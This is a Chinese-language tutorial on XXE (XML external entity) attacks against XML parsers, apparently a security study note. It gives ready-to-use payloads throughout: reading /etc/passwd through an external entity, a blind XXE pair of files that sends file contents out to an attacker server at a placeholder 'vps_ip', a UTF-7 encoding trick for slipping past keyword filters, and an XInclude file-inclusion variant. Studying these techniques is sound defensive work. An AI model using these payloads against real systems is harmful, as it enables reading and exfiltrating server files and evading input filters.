利用XXE漏洞读取文件

参考文献两篇：
https://www.anquanke.com/post/id/155328
https://www.anquanke.com/post/id/156227

XEE语法：

XML声明

<?xml version="1.0" encoding="UTF-8"?>  

encodeing是指使用的字符编码格式有UTF-8,GBK,gb2312等等,可用于bypass

XML实体

外部实体分SYSYTEM及PUBLIC两种：
SYSYTEM引用本地计算机，PUBLIC引用公共计算机，外部实体格式如下：

<!ENTITY 引用名 SYSTEM(PUBLIC) "URI地址">

DOCTYPE声明

在XML文档中，<!DOCTYPE[...]>声明跟在XML声明的后面。实体也必须在DOCTYPE声明中声明。
例如

<?xml version="1.0" unicode="UTF-8"?>
<!DOCTYPE[
     在此声明实体<!ENTITY 实体引用名 "引用内容">
]>

实体引用

引用方式分为一般实体引用和参数实体引用。

一般实体引用： &实体引用名;
参数实体引用： %实体引用名;

完整格式

<?xml version="1.0" encoding="GBK"?>
<!DOCTYPE root[
  <!ENTITY sky1 "引用字符1">
  <!ENTITY sky2 "引用字符2">
]>
<root>
  <title value="&sky1;"> &sky2; </title>
  <title2>
  <value><a>&sky2;</a></value>
  </title2>
</root>

XEE安全隐患：

在解析Xml时，如果攻击者可以控制xml格式的文本内容，就可以让编译语言/脚本语言接收到恶意构造的参数，若不加过滤，则会引起安全隐患。

libxml2是用于解析xml的库，在2.6版本之前，默认允许引用外部实体(开启LIBXML_NOENT)，可能导致xxe任意文件读取和BlindXXE文件读取攻击。

XXE任意文件读取

当xml解析内容有输出时，可以使用该攻击方法。
测试exp：

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>

此处将本地计算机中file:///etc/passwd文件的内容取出，赋值给了实体f
然后实体f的值作为元素x中的字符串数据被php解析的时候取出，作为对象里的内容
然后再输出该对象的时候被打印出来。

XXE任意文件盲读取

当XXE解析无输出时，尝试Blind XXE攻击：
1.我们可以利用file协议去读取本地文件
2.我们可以利用http协议让实体被带出

测试exp分为两部分：
post.xml

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % remote SYSTEM "http://vps_ip/evil.xml">
%remote;
%all;
]>
<root>&send;</root>

evil.xml

<!ENTITY % all "<!ENTITY send SYSTEM 'http://vps_ip/1.php?file=%file;'>">

这样一来，在解析xml的时候：
1.file实体被赋予file:///etc/passwd的内容
2.解析remote值的时候，访问http://vps_ip/evil.xml
3.在解析evil.xml中all实体的时候，将file实体带入
4.访问指定url链接，将数据带出
于是成功造成了blind xxe文件读取

关键词过滤Bypass

例如，当ENTITY等被过滤，那么我们可以尝试使用utf-7等其他编码方式。
首先利用该网站

https://www.motobit.com/util/charset-codepage-conversion.asp

将payload

<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>

转为utf-7，并在声明中指定utf-7编码

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE ANY +AFs-
    +ADwAIQ-ENTITY f SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-
+ADw-x+AD4AJg-f+ADsAPA-/x+AD4-

XXE文件包含

当libxml2版本高于2.6时，默认无法引用外部实体。可尝试XXE文件包含攻击。

<?xml version="1.0" ?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/passwd" parse="text"/>
</root>

另外，xml用于数据存储时，将其当作是数据库，可能存在Xpath注入、Xpath盲注、代码注入等攻击方式。